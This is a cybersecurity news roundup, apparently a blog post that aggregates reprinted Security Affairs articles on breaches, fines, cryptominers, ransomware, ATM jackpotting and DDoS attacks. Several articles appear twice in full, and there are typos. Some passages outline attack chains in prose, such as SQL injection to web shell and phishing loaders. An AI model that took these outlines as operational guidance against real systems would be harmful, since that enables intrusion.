The UK Information Commission's Office (ICO) heavily criticised the Carphone Warehouse for security inadequacies and fined the company £400K following their 2015 data breach, when the personal data, including bank details, of millions of Carphone Warehouse customers, was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack", where have we heard that excuse before? Certainly the ICO wasn't buying that after it investigated, reporting a large number Carphone Warehouse's security failures, which included the use of software that was six years out of day,  lack of “rigorous controls” over who had login details to systems; no antivirus protection running on the servers holding data, the same root password being used on every individual server, which was known to “some 30-40 members of staff”; and the needless storage of full credit card details. The Carphone Warephone should thank their lucky stars the breach didn't occur after the General Data Protection Regulation comes into force, as with such a damning list of security failures, the company may well have been fined considerably more by ICO, when it is granted vastly greater financial sanctions and powers when the GDPR kicks in May.

The National Cyber Security Centre warned the UK national infrastructure faces serious nation-state attacks, stating it is a matter of a "when" not an "if". There also claims that the cyberattacks against the Ukraine in recent years was down to Russia testing and tuning it's nation-state cyberattacking capabilities. 

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPeyta ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, where the hackers redirected 700k BlackWallet users to a fake replica BlackWallet website after compromising BlackWallet's DNS server. The replica website ran a script that transferred user cryptocurrency into the hacker's wallet, the hacker then moved currency into a different wallet platform.

In the United States, 
the Federal Trade Commission (FTC) fined toy firm VTech US$ 650,000 (£482,000) for violating a US children's privacy laws. The FTC alleged the toy company violated (COPPA) Children's Online Privacy Protection Rule by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever21 and lapses in encryption was responsible for the theft of debit and credit card details from Forever21 stores late last year. Payment card data continues to be a high valued target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January,  the Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents have doubled in 2017 and 93% were preventable. Carbon Black's 2017 Threat Report stated non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both the professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and the number of attacks skyrocketed during the course of the year, no surprise there.  

Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also allows them to identify ideal attack points to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.

NEWS

AWARENESS, EDUCATION AND THREAT INTELLIGENCE

REPORTS

WannaMine, the sophisticated crypto miner that spreads via NSA EternalBlue exploit

Researchers from security firm CrowdStrike spotted a new Monero crypto-mining worm dubbed WannaMine that spreads leveraging the NSA-linked EternalBlue exploit.

This morning I wrote about the Smominru botnet that used NSA exploit to infect more than 526,000 systems, and I explained that other threat actors are using similar techniques to mine cryptocurrency.

This is the case of a strain of the Monero crypto-mining worm dubbed WannaMine that spreads leveraging the EternalBlue exploit.

ETERNALBLUE is the alleged NSA exploit that made the headlines with DOUBLEPULSAR in the WannaCry attack, it targets the SMBv1 protocol and has become widely adopted in the community of malware developers.

In June, following the WannaCry attacks experts discovered that there were at least other 3 different groups have been leveraging the NSA EternalBlue exploit,

Back to the present, WannaMine was developed to mine the Monero cryptocurrency abusing victims’ resources. According to security researchers at CrowdStrike, the malicious code is very sophisticated, it implements a spreading mechanism and persistence model similar to those used by state-sponsored APT groups.

“CrowdStrike has recently seen several cases where mining has impacted business operations, rendering some companies unable to operate for days and weeks at a time. The tools have caused systems and applications to crash due to such high CPU utilization speeds.” reads the analysis published by CrowdStrike. 

“CrowdStrike has observed more sophisticated capabilities built into a cryptomining worm dubbed WannaMine. This tool leverages persistence mechanisms and propagation techniques similar to those used by nation-state actors, demonstrating a trend highlighted in the recent CrowdStrike Cyber Intrusion Services Casebook 2017, which states that “contemporary attacks continue to blur the lines between nation-state and eCrime tactics.”

WannaMine is a fileless that was first reported by researchers at Panda Security.

WannaMine

The malicious code implements so-called “living off the land” techniques to gain persistence on the infected system leveraging Windows Management Instrumentation (WMI) permanent event subscriptions. WannaMine registers a permanent event subscription that would execute every 90 minutes a PowerShell command located in the Event Consumer.

Experts noticed that the malware uses credential harvester Mimikatz to collect users’ credentials that could be used for lateral movements. It also relies on the EternalBlue exploit in case it is not able to move laterally with the above technique.

WannaMine is able to infect systems running all Windows versions starting with Windows 2000, including 64-bit versions and Windows Server 2003.

“While the tactics, techniques, and procedures (TTPs) displayed in WannaMine did not require a high degree of sophistication, the attack clearly stands on the shoulders of more innovative and enterprising nation-state and eCrime threat actors. CrowdStrike anticipates that these threat actors will continue to evolve their capabilities to go undetected,” CrowdStrike concluded.

WannaMine would degrade the performance of the infected machines, in case of laptops the malicious code could cause damages if it runs continuously for several hours.

Sophos experts published an interesting post containing Q&A on WannaMine.

 

Pierluigi Paganini

(Security Affairs – WannaMine , cryptocurrency miner)

The post WannaMine, the sophisticated crypto miner that spreads via NSA EternalBlue exploit appeared first on Security Affairs.

Security Affairs: WannaMine, the sophisticated crypto miner that spreads via NSA EternalBlue exploit

Researchers from security firm CrowdStrike spotted a new Monero crypto-mining worm dubbed WannaMine that spreads leveraging the NSA-linked EternalBlue exploit.

This morning I wrote about the Smominru botnet that used NSA exploit to infect more than 526,000 systems, and I explained that other threat actors are using similar techniques to mine cryptocurrency.

This is the case of a strain of the Monero crypto-mining worm dubbed WannaMine that spreads leveraging the EternalBlue exploit.

ETERNALBLUE is the alleged NSA exploit that made the headlines with DOUBLEPULSAR in the WannaCry attack, it targets the SMBv1 protocol and has become widely adopted in the community of malware developers.

In June, following the WannaCry attacks experts discovered that there were at least other 3 different groups have been leveraging the NSA EternalBlue exploit,

Back to the present, WannaMine was developed to mine the Monero cryptocurrency abusing victims’ resources. According to security researchers at CrowdStrike, the malicious code is very sophisticated, it implements a spreading mechanism and persistence model similar to those used by state-sponsored APT groups.

“CrowdStrike has recently seen several cases where mining has impacted business operations, rendering some companies unable to operate for days and weeks at a time. The tools have caused systems and applications to crash due to such high CPU utilization speeds.” reads the analysis published by CrowdStrike. 

“CrowdStrike has observed more sophisticated capabilities built into a cryptomining worm dubbed WannaMine. This tool leverages persistence mechanisms and propagation techniques similar to those used by nation-state actors, demonstrating a trend highlighted in the recent CrowdStrike Cyber Intrusion Services Casebook 2017, which states that “contemporary attacks continue to blur the lines between nation-state and eCrime tactics.”

WannaMine is a fileless that was first reported by researchers at Panda Security.

WannaMine

The malicious code implements so-called “living off the land” techniques to gain persistence on the infected system leveraging Windows Management Instrumentation (WMI) permanent event subscriptions. WannaMine registers a permanent event subscription that would execute every 90 minutes a PowerShell command located in the Event Consumer.

Experts noticed that the malware uses credential harvester Mimikatz to collect users’ credentials that could be used for lateral movements. It also relies on the EternalBlue exploit in case it is not able to move laterally with the above technique.

WannaMine is able to infect systems running all Windows versions starting with Windows 2000, including 64-bit versions and Windows Server 2003.

“While the tactics, techniques, and procedures (TTPs) displayed in WannaMine did not require a high degree of sophistication, the attack clearly stands on the shoulders of more innovative and enterprising nation-state and eCrime threat actors. CrowdStrike anticipates that these threat actors will continue to evolve their capabilities to go undetected,” CrowdStrike concluded.

WannaMine would degrade the performance of the infected machines, in case of laptops the malicious code could cause damages if it runs continuously for several hours.

Sophos experts published an interesting post containing Q&A on WannaMine.

 

Pierluigi Paganini

(Security Affairs – WannaMine , cryptocurrency miner)

The post WannaMine, the sophisticated crypto miner that spreads via NSA EternalBlue exploit appeared first on Security Affairs.



Security Affairs

Ransomware And Cryptomining Spiked In 2017 According To Report

Spoiler alert: There are a lot of exploits and malware spreading online in an attempt to ruin your day. Year after year security vendors compile data to produce annual reports

The post Ransomware And Cryptomining Spiked In 2017 According To Report appeared first on The Cyber Security Place.

Malware exploiting Spectre and Meltdown flaws are currently based on available PoC

Malware Exploiting Spectre, Meltdown Flaws Emerges

Researchers at the antivirus testing firm AV-TEST have discovered more than 130 samples of malware that were specifically developed to exploit the Spectre and Meltdown CPU vulnerabilities.

The good news is that these samples appear to be the result of testing activities, but experts fear that we could soon start observing attacks in the wild.

Most of the codes obtained by AV-TEST are just recompiled versions of the Proof of Concept code available online. Experts at AV-TEST also found the first JavaScript PoC codes for web browsers like IE, Chrome or Firefox in our database now.

“We also found the first JavaScript PoC codes for web browsers like IE, Chrome or Firefox in our database now.”Andreas Marx, CEO of AV-TEST, told SecurityWeek.

The Meltdown attack could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

The Meltdown exploits the speculative execution to breach the isolation between user applications and the operating system, in this way any application can access all system memory.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

On January 17, experts at AV-TEST reported that they had detected 77 malware samples apparently related to the Intel vulnerabilities.

The number of malware samples related to Meltdown and Spectre reached pi119 by January 23.

On January 31, AV-TEST confirmed to be in possession of 139 samples from various sources.

 

According to the AV-TEST CEO, several groups of experts are working on a malware that could trigger Intel flaws, most of them are re-engineering the available PoC.

“We aren’t the only ones concerned. Others in the cybersecurity community have clearly taken notice, because between January 7 and January 22 the research team at AV-Test discovered 119 new samples associated with these vulnerabilities,” reads a blog post published by Fortinet. “FortiGuard Labs has analyzed all of the publicly available samples, representing about 83 percent of all the samples that have been collected, and determined that they were all based on proof of concept code.  The other 17 percent may have not been shared publicly because they were either under NDA or were unavailable for reasons unknown to us.”

 

Pierluigi Paganini

(Security Affairs – Spectre and Meltdown, malware)

The post Malware exploiting Spectre and Meltdown flaws are currently based on available PoC appeared first on Security Affairs.

Is ICEMAN behind the malware-based attack on Crystal Finance Millennium?

Exclusive – The Iceman gang taking responsibility for infecting Crystal Finance Millennium, the journalist Marc Miller interviewd one of the members of the crew.

Iceman gang member confirms that they are behind the introduction and spreading of malware that infected the systems at Crystal Finance Millennium.

In Septemeber security experts at TrendMicro reported that the Ukraine based Account Firm, Crystal Finance Millennium (CFM), has been hacked and is found to be distributing malware.

The incident caused the firm to take down its website to stop spreading the threat.

Crystal Finance Millennium ICEMAN

Crystal Finance Millennium attack (Source Trend Micro)

Marc Miller had a chance to speak to one of the gang members on XMMP and he confirmed that the Iceman group is behind this attack. They started with a simple web attack (SQLI which lead to web shell upload, no privilege escalation was needed) in order to gain access to the web servers of the company.

He confirmed that the math was simple, the Ukrainian company had many clients in the financial and medical sector which facilitated the propagation of their malware. From the archived web page, it becomes apparent they provide accounting software, personalization of medical records, blood service and “full automation of the doctor’s office” – contrary to what their company name suggests, it appears they are (mostly) focused on medical software.

The group sent phishing emails to various targets based in Ukraine and former Soviet countries. The emails contained a ZIP file that, in turn, contained a JavaScript file. When users unzipped the archive and ran the JS file, the script would download a file named load.exe from the CFM’s web server.

The loader (load.exe file) will, later on, download a Purge ransomware that was modified for that operation by the Iceman group. According to the gang, each target was treated individually to maximize profit. Sometimes they would run a ransomware program and sometimes they would run a banking Trojan. “When you sophisticate your attack, you can drain the sharks” – he said.

An inclusive interview is in the making to unveil the course of this attack. It will be released in the upcoming weeks.

About the Author: Marc Miller
Marc Miller is a web journalist, focused on cybercrime.

He started a blog called: THE PURPLE HAT – Cyber Gangs NAKED, dedicated to exposing the methods and works of cybercrime gangs such as “CARBANAK” or similar sophisticated syndicated Cybercrime organizations.

In the past. he worked as a web front-end programmer. Also, he is passionate about hardware, hacking, security and marketing.

 

Pierluigi Paganini

(Security Affairs – ICEMAN, Crystal Finance Millennium)

The post Is ICEMAN behind the malware-based attack on Crystal Finance Millennium? appeared first on Security Affairs.

Security Affairs: Is ICEMAN behind the malware-based attack on Crystal Finance Millennium?

Exclusive – The Iceman gang taking responsibility for infecting Crystal Finance Millennium, the journalist Marc Miller interviewd one of the members of the crew.

Iceman gang member confirms that they are behind the introduction and spreading of malware that infected the systems at Crystal Finance Millennium.

In Septemeber security experts at TrendMicro reported that the Ukraine based Account Firm, Crystal Finance Millennium (CFM), has been hacked and is found to be distributing malware.

The incident caused the firm to take down its website to stop spreading the threat.

Crystal Finance Millennium ICEMAN

Crystal Finance Millennium attack (Source Trend Micro)

Marc Miller had a chance to speak to one of the gang members on XMMP and he confirmed that the Iceman group is behind this attack. They started with a simple web attack (SQLI which lead to web shell upload, no privilege escalation was needed) in order to gain access to the web servers of the company.

He confirmed that the math was simple, the Ukrainian company had many clients in the financial and medical sector which facilitated the propagation of their malware. From the archived web page, it becomes apparent they provide accounting software, personalization of medical records, blood service and “full automation of the doctor’s office” – contrary to what their company name suggests, it appears they are (mostly) focused on medical software.

The group sent phishing emails to various targets based in Ukraine and former Soviet countries. The emails contained a ZIP file that, in turn, contained a JavaScript file. When users unzipped the archive and ran the JS file, the script would download a file named load.exe from the CFM’s web server.

The loader (load.exe file) will, later on, download a Purge ransomware that was modified for that operation by the Iceman group. According to the gang, each target was treated individually to maximize profit. Sometimes they would run a ransomware program and sometimes they would run a banking Trojan. “When you sophisticate your attack, you can drain the sharks” – he said.

An inclusive interview is in the making to unveil the course of this attack. It will be released in the upcoming weeks.

About the Author: Marc Miller
Marc Miller is a web journalist, focused on cybercrime.

He started a blog called: THE PURPLE HAT – Cyber Gangs NAKED, dedicated to exposing the methods and works of cybercrime gangs such as “CARBANAK” or similar sophisticated syndicated Cybercrime organizations.

In the past. he worked as a web front-end programmer. Also, he is passionate about hardware, hacking, security and marketing.

 

Pierluigi Paganini

(Security Affairs – ICEMAN, Crystal Finance Millennium)

The post Is ICEMAN behind the malware-based attack on Crystal Finance Millennium? appeared first on Security Affairs.



Security Affairs

US Attorney General set up the Joint Criminal Opioid Darknet Enforcement team to fight online opioid trafficking

The US Attorney General announced the creation of the Joint Criminal Opioid Darknet Enforcement team to fight online opioid trafficking.

Tor network is still a privileged ecosystem for cyber criminals and pedos, law enforcement and intelligence agencies worldwide reserve a significative effort in fighting any illegal practice that leverages anonymizing networks.

The US Attorney General has set up a task force, dubbed Joint Criminal Opioid Darknet Enforcement (J-CODE), composed of federal agents and cyber experts to dismantle black marketplaces that offer for sale any kind of drug.

The Joint Criminal Opioid Darknet Enforcement team will be distributed in many cities across the US, the feds are tasked to infiltrate the black markets, identify the operators, and shut down them.

The darknet, and in particular black marketplaces, have a relevant aggregation role for the distribution of illegal opioids. Even if many sellers are overseas,  the Joint Criminal Opioid Darknet Enforcement team will be focused on domestic operators.

During the official announcement of the task force, Attorney General Jeff explained the abuses of anonymizing networks, but he also highlighted that they can be used for good purposes, such as to avoid censorship. Sessions added that the hard work of law enforcement agencies allowed the infiltration of illegal rings.

“Criminals think that they are safe on the darknet, but they are in for a rude awakening,” Sessions said.

“We have already infiltrated their networks, and we are determined to bring them to justice. The J-CODE team will help us continue to shut down the online marketplaces that drug traffickers use and ultimately that will help us reduce addiction and overdoses across the nation.” 

Drugs represent a serious threat to the state, it has been estimated that opioids kill more than 90 Americans every day through overdoses, and this is the tip of the iceberg of a phenomenon that has many other dramatic consequences.

The creation of the Joint Criminal Opioid Darknet Enforcement is an important investment in fighting online opioid trafficking in term or resources and cyber capabilities.

“J-CODE will more than double the FBI’s investment in fighting online opioid trafficking.  The FBI is dedicating dozens more Special Agents, Intelligence Analysts, and professional staff to J-CODE so that they can focus on this one issue of online opioid trafficking.” concluded the press release published by the DoJ.

 

Pierluigi Paganini

(Security Affairs – Joint Criminal Opioid Darknet Enforcement, dark web)

The post US Attorney General set up the Joint Criminal Opioid Darknet Enforcement team to fight online opioid trafficking appeared first on Security Affairs.

Cybercriminals Stealing From Cybercriminals Ransomware Victims Left Stranded

What do you get when you add Bitcoin, with a TOR network proxy and cybercriminals? Even more cybercrime!

Bitcoin is the preferred cryptocurrency for ransomware payments. Like most cryptocurrencies it is largely anonymous, allowing the ransoming cybercriminals to collect their money while staying safely in the shadows. Even though Bitcoin is the most popular cryptocurrency, the majority of victims do not have a ready cache of Bitcoin to pay ransom with so the cybercriminals came up with a process to facilitate these ransom payments.

Payment websites are hosted on the Tor network where victims login, purchase Bitcoin and deposit them into the wallet of the bad actors. Sounds convenient, unless there is another bad actor in the middle. To understand how that happens, we first need to explain the Tor network.

Tor is an acronym based on a software project called The Onion Router. It “[redirects] Internet traffic through a free, worldwide, volunteer overlay network consisting of more than seven thousand relays to conceal a user’s location and usage…“, Tor (anonymity network), Wikipedia. In other words, you must use a Tor client to connect to the Tor network and in doing so, you participate as a relay in the network helping to provide anonymity for all other users.

There are many situations where this type of Internet anonymity would be useful: researching a company without alerting them to who is looking, researching a controversial topic without being identified, avoiding oppressive government restrictions or spying, and facilitating Bitcoin payments while hiding the location of the web server. The challenge for the ransomers is that victims are even less likely to be set up with a Tor client than they are to have Bitcoin! To solve this problem, there are individuals who run “Tor proxies.” These proxies are accessible with a regular browser on the Internet so no special software is required. For example, the hidden server on the Tor network might be addressed by hxxps://sketchwebsite.onion which requires a Tor browser to connect. However by entering hxxps://sketchwebsite.onion.to into a regular browser, a connection is made with a “regular server” on the Internet which redirects (proxies) the request to sketchwebsite.onion on your behalf. You can surf the Tor network, and make your Bitcoin payments with no special software required. By design, a proxy takes a connection from one party and passes it to another. This involves looking at the incoming request to understand where it needs to be forwarded. This also creates an opportunity for the proxy to make changes in between.

Proofpoint is the security vendor that identified cybercriminals taking advantage of Tor proxies to steal from victims and the ransoming cybercriminals. They discovered that when victims attempted to connect to the ransomers’ website through a Tor proxy, the criminals operating the proxy made changes to the stream. Instead of the Bitcoin being deposited to the intended ransomer’s digital wallets, the funds were redirected to the proxy operator’s wallet. While you won’t be sympathetic to the ransoming cybercriminals’ loss of revenue, the real problem is that without payment they won’t release the decryption key to the victim. The ransomware victim thought they were paying Bitcoin to the ransomer for the decryption key, but with the man-in-the-middle attack at the Tor proxy they paid for nothing.

Through some very detailed analysis documented here, Proofpoint estimates that approximately 2 BTC have been redirected (around $20,000 at the time they published their article.) It was a notice on the LockeR ransomware payment portal that alerted Proofpoint researchers that something was amiss in the cybercrime underworld:

bitcoin ransomware

“While this is not necessarily a bad thing, it does raise an interesting business problem for ransomware threat actors and practical issues for ransomware victims by further increasing the risk to victims who would resort to paying ransomware ransoms,” Proofpoint researchers said. “This kind of scheme also reflects the broader trend of threat actors of all stripes targeting cryptocurrency theft. Continued volatility in cryptocurrency markets and increasing interest in the Tor network will likely drive further potential abuses of Tor proxies, creating additional risks for new users.”

About the author:  Steve Biswanger has over 20 years experience in Information Security consulting, and is a frequent speaker on risk, ICS and IoT topics. He is currently Director of Information Security for Encana, a North American oil & gas company and sits on the Board of Directors for the (ISC)2 Alberta Chapter.
 

Pierluigi Paganini

(Security Affairs – Bitcoin, cybercrime)

The post Cybercriminals Stealing From Cybercriminals Ransomware Victims Left Stranded appeared first on Security Affairs.

Three Dutch banks and Tax Agency under DDoS Attacks … is it a Russian job?

Three Dutch Banks (ABN AMRO, ING Bank, Rabobank) and Tax Agency were targeted by a coordinated DDoS Attacks a few days the revelation of the Russian APT Hack.

Early this week a massive DDoS attack targeted three Dutch banks, ABN AMROING BankRabobank, and the Dutch Taxation Authority (Belastingdienst).

The attack against the system of ABN AMRO started over the weekend, while both ING Bank and Rabobank suffered coordinated DDoS attacks on Monday.
while the other two banks were hit on Monday.

The DDoS attacks caused severe accessibility problems to the bank infrastructure, they prevented customers from accessing the web services.

The attack against the Dutch Tax Authority prevented taxpayers filing tax-related documents.

DDoS attack three dutch banks ABN_AMRO_Hoofdkantoor_04

Who is behind the attack?

According to security experts from ESET, the origins of the attacks are servers in Russia.

“The DDoS attacks that hit  and  over the weekend and on Monday, came from servers in Russia, according to security company ESET. The company adds that this does not automatically mean that the perpetrators are also in Russia, the Telegraaf reports.states NL Times.

“The perpetrators used a so-called botnet – an army of hijacked computers and smart devices – to commit the DDoS attacks. Using the program Zbot, they remotely ordered these devices to visit a certain site en masse, thereby overloading the site’s server and crashing the site. The command and control servers are mainly in Russia, ESET determined.”

It is difficult to attribute the attack to a specific threat actor. anyway, the cybersecurity expert Richey Gevers noted that the attacks came a few days after the story of the Cozy Bear hack operated by the Dutch Intelligence Agency AIVD. According to Gevers, the DDoS attack peaked 40 Gbps in volume of traffic.

The expert also added that the attackers powered the attacks using a botnet composed of home routers.

 

The Ministry of Justice and Security called the attacks on the Dutch institutions very advanced, according to BNR. “But for example Dutch banks are known in Europe for having their cyber security in order. You often see that this provokes more advanced attacks. We are now fighting at a very high level”, the Ministry said. The Ministry can’t yet say who is behind these attacks.

Researchers from ESET claimed the attackers used the Zbot malware, a very old threat based on the infamous ZeuS banking trojan.

According to BNR, even is the malware is not complex, the Ministry of Justice and Security has classified the attacks on the Dutch institutions as very complex

“But for example Dutch banks are known in Europe for having their cyber security in order. You often see that this provokes more advanced attacks. We are now fighting at a very high level”, the Ministry said. The Ministry can’t yet say who is behind these attacks.

 

Pierluigi Paganini

(Security Affairs – DDoS attacks, Dutch banks)

The post Three Dutch banks and Tax Agency under DDoS Attacks … is it a Russian job? appeared first on Security Affairs.

Crooks target ATMs with Ploutus-D malware, these are the first confirmed cases of Jackpotting in US

Cybercriminals are targeting ATM machines in the US forcing them to spit out hundreds of dollars with ‘jackpotting‘ attacks.

According to a senior US Secret Service official, the organization has managed to steal more than $1m from ATM machines using this technique.

Once crooks gain physical access to the ATM, they will infect it with a malware or specialized electronics that is designed to instruct the machine to deliver money in response to specific commands.

The jackpotting technique was first proposed by white hat hacker Barnaby Jack in 2010.

Barnaby Jack Jackpotting video

The popular investigator Brian Krebs obtained an alert issued by ATM maker manufacturers Diebold Nixdorf this month, the company warns of an ongoing campaign conducted by a gang in the US.

“On Jan. 21, 2018, KrebsOnSecurity began hearing rumblings about jackpotting attacks, also known as “logical attacks,” hitting U.S. ATM operators. I quickly reached out to ATM giant NCR Corp. to see if they’d heard anything. NCR said at the time it had received unconfirmed reports, but nothing solid yet.” wrote Krebs.

“On Jan. 26, NCR sent an advisory to its customers saying it had received reports from the Secret Service and other sources about jackpotting attacks against ATMs in the United States.”

“While at present these appear focused on non-NCR ATMs, logical attacks are an industry-wide issue,” the NCR alert reads. “This represents the first confirmed cases of losses due to logical attacks in the US. This should be treated as a call to action to take appropriate steps to protect their ATMs against these forms of attack and mitigate any consequences.”

The crooks are infecting the ATM with the Ploutus-D malware, the vendor warns that Opteva 500 and 700 series machines are particularly vulnerable to these attacks.

These attacks are the first confirmed cases of jackpotting attacks against ATMs in the US. Jackpotting attacks were already reported in Europe, in May 27 people have been arrested by the Europol for jackpotting attacks on ATM across many countries in Europe.

Ploutus is one of the sophisticated ATM malware that was first discovered in Mexico back in 2013. The malicious code allows crooks to steal cash from ATMs using either an external keyboard attached to the machine or by sending it SMS messages.

In January, experts at FireEye Labs have discovered a new version of the Ploutus ATM malware, the so-called Ploutus-D, that works the KAL’s Kalignite multivendor ATM platform.

The experts observed the Ploutus-D in attacks against ATM of the vendor Diebold, but the most worrisome aspect of the story is that minor changes to the malware code could allow Ploutus-D to target a wide range of ATM vendors in 80 countries.

Ploutus-D

The alert issued by Secret Service explains that the cybercriminals use an endoscope to inspect the internal parts of the ATM searching for the place where they can attach a cord that allows them to sync their laptop with the ATM’s computer.

endoscope jackpotting

Diebold Nixdorf urges the improvement of physical security for ATMs, especially for those located in public places such as malls and pharmacies. Also, tightening the security configuration of the firmware is recommended.

The alert issued by Secret service recommends to limit physical access to the ATM machines and implement protection mechanisms for cash modules (i.e. Use firmware with latest security functionality. use the most secure configuration of encrypted communications incl. physical authentication).

Pierluigi Paganini

(Security Affairs – Jackpotting, banking)

The post Crooks target ATMs with Ploutus-D malware, these are the first confirmed cases of Jackpotting in US appeared first on Security Affairs.

Security Affairs: Crooks target ATMs with Ploutus-D malware, these are the first confirmed cases of Jackpotting in US

Cybercriminals are targeting ATM machines in the US forcing them to spit out hundreds of dollars with ‘jackpotting‘ attacks.

According to a senior US Secret Service official, the organization has managed to steal more than $1m from ATM machines using this technique.

Once crooks gain physical access to the ATM, they will infect it with a malware or specialized electronics that is designed to instruct the machine to deliver money in response to specific commands.

The jackpotting technique was first proposed by white hat hacker Barnaby Jack in 2010.

Barnaby Jack Jackpotting video

The popular investigator Brian Krebs obtained an alert issued by ATM maker manufacturers Diebold Nixdorf this month, the company warns of an ongoing campaign conducted by a gang in the US.

“On Jan. 21, 2018, KrebsOnSecurity began hearing rumblings about jackpotting attacks, also known as “logical attacks,” hitting U.S. ATM operators. I quickly reached out to ATM giant NCR Corp. to see if they’d heard anything. NCR said at the time it had received unconfirmed reports, but nothing solid yet.” wrote Krebs.

“On Jan. 26, NCR sent an advisory to its customers saying it had received reports from the Secret Service and other sources about jackpotting attacks against ATMs in the United States.”

“While at present these appear focused on non-NCR ATMs, logical attacks are an industry-wide issue,” the NCR alert reads. “This represents the first confirmed cases of losses due to logical attacks in the US. This should be treated as a call to action to take appropriate steps to protect their ATMs against these forms of attack and mitigate any consequences.”

The crooks are infecting the ATM with the Ploutus-D malware, the vendor warns that Opteva 500 and 700 series machines are particularly vulnerable to these attacks.

These attacks are the first confirmed cases of jackpotting attacks against ATMs in the US. Jackpotting attacks were already reported in Europe, in May 27 people have been arrested by the Europol for jackpotting attacks on ATM across many countries in Europe.

Ploutus is one of the sophisticated ATM malware that was first discovered in Mexico back in 2013. The malicious code allows crooks to steal cash from ATMs using either an external keyboard attached to the machine or by sending it SMS messages.

In January, experts at FireEye Labs have discovered a new version of the Ploutus ATM malware, the so-called Ploutus-D, that works the KAL’s Kalignite multivendor ATM platform.

The experts observed the Ploutus-D in attacks against ATM of the vendor Diebold, but the most worrisome aspect of the story is that minor changes to the malware code could allow Ploutus-D to target a wide range of ATM vendors in 80 countries.

Ploutus-D

The alert issued by Secret Service explains that the cybercriminals use an endoscope to inspect the internal parts of the ATM searching for the place where they can attach a cord that allows them to sync their laptop with the ATM’s computer.

endoscope jackpotting

Diebold Nixdorf urges the improvement of physical security for ATMs, especially for those located in public places such as malls and pharmacies. Also, tightening the security configuration of the firmware is recommended.

The alert issued by Secret service recommends to limit physical access to the ATM machines and implement protection mechanisms for cash modules (i.e. Use firmware with latest security functionality. use the most secure configuration of encrypted communications incl. physical authentication).

Pierluigi Paganini

(Security Affairs – Jackpotting, banking)

The post Crooks target ATMs with Ploutus-D malware, these are the first confirmed cases of Jackpotting in US appeared first on Security Affairs.



Security Affairs

Dridex banking Trojan and the FriedEx ransomware were developed by the same group

Security researchers from ESET have tied another family of ransomware, dubbed FriedEx (aka BitPaymer), to the authors of the Dridex Trojan.

The Dridex banking Trojan that has been around since 2014, it was involved in numerous campaigns against financial institutions over the years and crooks have continuously improved it.

In April 2017, millions of people were targeted by a phishing campaign exploiting a Microsoft Word 0day and aimed to spread the Dridex Banking Trojan, a few days ago security researchers at Forcepoint spotted a new spam campaign that is abusing compromised FTP servers as a repository for malicious documents and infecting users with the Dridex banking Trojan.

Now, security researchers from ESET have tied another strain of ransomware, dubbed FriedEx (aka BitPaymer), to the authors of the Dridex Trojan.

FriedEx was first spotted in July, and in August it was responsible for infections at NHS hospitals in Scotland.

The FriedEx ransomware was involved in attacks against high profile targets, researchers believe it was delivered via Remote Desktop Protocol (RDP) brute force attacks.

The ransomware encrypts each file using a randomly generated RC4 key that is then encrypted with a hardcoded 1024-bit RSA public key.

“Initially dubbed BitPaymer, based on text in its ransom demand web site, this ransomware was discovered in early July 2017 by Michael Gillespie. In August, it returned to the spotlight and made headlines by infecting NHS hospitals in Scotland.” states the analysis published by ESET.

FriedEx focuses on higher profile targets and companies rather than regular end users and is usually delivered via an RDP brute force attack. The ransomware encrypts each file with a randomly generated RC4 key, which is then encrypted using the hardcoded 1024-bit RSA public key and saved in the corresponding .readme_txt file.”

The analysis of FriedEx code revealed that many similarities with Dridex code.

For example, the Dridex and FriedEx binaries share the same portion of a function used for generating UserID, the experts also noticed that the order of the functions in the binaries is the same in both malware families, a circumstance that suggests the two malware share the same codebase.

FriedEx

“It resolves all system API calls on the fly by searching for them by hash, stores all strings in encrypted form, looks up registry keys and values by hash, etc. The resulting binary is very low profile in terms of static features and it’s very hard to tell what the malware is doing without a deeper analysis.” states ESET.

Both Dridex and FriedEx use the same packer, but experts explained that the same packer is also used by other malware families like QBot, Emotet or Ursnif also use it.

Another similarity discovered by the researchers is related to the PDB (Program Database) paths included in both malware. PDB paths point to a file that contains debug symbols used by vxers to identify crashes, the paths revealed the binaries of both threats are compiled in Visual Studio 2015.

The experts also analyzed the timestamps of the binaries and discovered in many cases they had the same date of compilation, but it is not a coincidence.

“Not only do the compilations with the same date have time differences of several minutes at most (which implies Dridex guys probably compile both projects concurrently), but the randomly generated constants are also identical in these samples. These constants change with each compilation as a form of polymorphism, to make the analysis harder and to help avoid detection.” continues the analysis.

The experts concluded that FriedEx was developed by the Dridex development team, they believe that the criminal gang not only will continue to improve the banking Trojan but it will also follow malware “trends” developing their own strain of ransomware.

Pierluigi Paganini

(Security Affairs – FriedEx ransomware, Dridex)

The post Dridex banking Trojan and the FriedEx ransomware were developed by the same group appeared first on Security Affairs.

A new report from MALWAREBYTES reveals a rise of 90% on ransomware detection in business

A new report from MALWAREBYTES titled “Malwarebytes Annual State of Malware Report” reveals a rise of 90% on ransomware detection in business.

The report brings to light new trends on hackers activities and threats especially the rise of ransomware as a tool of choice.

Researchers from MALWAREBYTES had gathered an enormous amount of data from the telemetry of their products, intel teams, and data science from January to November 2016 and to January to November 2017 to consolidate the evolution of the threat landscape of malware.

